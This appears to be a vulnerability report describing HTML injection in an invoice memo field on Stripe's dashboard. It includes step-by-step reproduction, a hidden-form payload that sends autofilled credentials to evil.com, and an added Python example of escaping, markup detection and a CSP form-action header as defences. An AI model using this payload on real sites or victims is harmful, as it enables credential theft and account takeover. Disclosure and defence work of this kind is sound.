In customer invoices a memo field is vulnerable to HTML injection. So I can take over any victim's account with auto-save functionality through HTML injection. Basically, when we have saved the login credentials in our browser and try to log in to the account, the browser automatically fills the email and password; we just need to click on login. So I created a login form, made the email and password fields invisible by setting opacity:0 in CSS, and set my button name to "Load more content".
Log in to your account and save your email and password in your browser.
Go to https://dashboard.stripe.com/invoices. Create a new invoice or edit any invoice.
The memo field is vulnerable to HTML injection. So just paste this HTML code into the memo field: <form action="//evil.com" method="GET"><input type="text" name="u" style="opacity:0;"><input type="password" name="p" style="opacity:0;"><input type="submit" name="s" value="Load more content"></form>
Save the invoice. Now open that invoice in a new tab.
You can see a "Load more content" button there. Just click on that button, and on evil.com you will find your email and password in the URL.
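A server-side defence for the memo field described in the steps above, written as an added example (this is not Stripe's code, and the function names are hypothetical): memo text is entity-encoded before rendering so a pasted form shows up as literal characters, incoming memos that contain any markup are flagged for review, and a CSP form-action directive keeps any form that did slip through from submitting to another origin. The sample memos are constructed, with the report's payload quotes normalised.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the report's payload (quotes normalised) stored as a memo.
INJECTED_MEMO = (
    '<form action="//evil.com" method="GET">'
    '<input type="text" name="u" style="opacity:0;">'
    '<input type="password" name="p" style="opacity:0;">'
    '<input type="submit" name="s" value="Load more content"></form>'
)
# Constructed benign memo with a character that must still be escaped.
BENIGN_MEMO = "Thanks for your order! Terms: 2% early-payment discount & net 30."


class _TagCollector(HTMLParser):
    """Records every start tag so we can tell whether a memo carries markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def find_markup(memo):
    """Return the HTML tag names found in a memo (empty list for plain text).
    Run this on the write path to flag memos containing tags such as <form>
    or <input>, which have no place in an invoice note."""
    parser = _TagCollector()
    parser.feed(memo)
    parser.close()
    return parser.tags


def render_memo(memo):
    """Render the memo as text: <, >, &, " and ' become entities, so an
    injected <form> is displayed as characters instead of a clickable form."""
    return '<p class="memo">' + html.escape(memo, quote=True) + "</p>"


def invoice_response_headers():
    """Defence in depth: form-action 'self' makes the browser refuse to submit
    any form on the invoice page to an origin other than our own."""
    return {"Content-Security-Policy": "default-src 'self'; form-action 'self'"}
```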
You can take over any victim's account by sending them that invoice.
Take over any victim's account.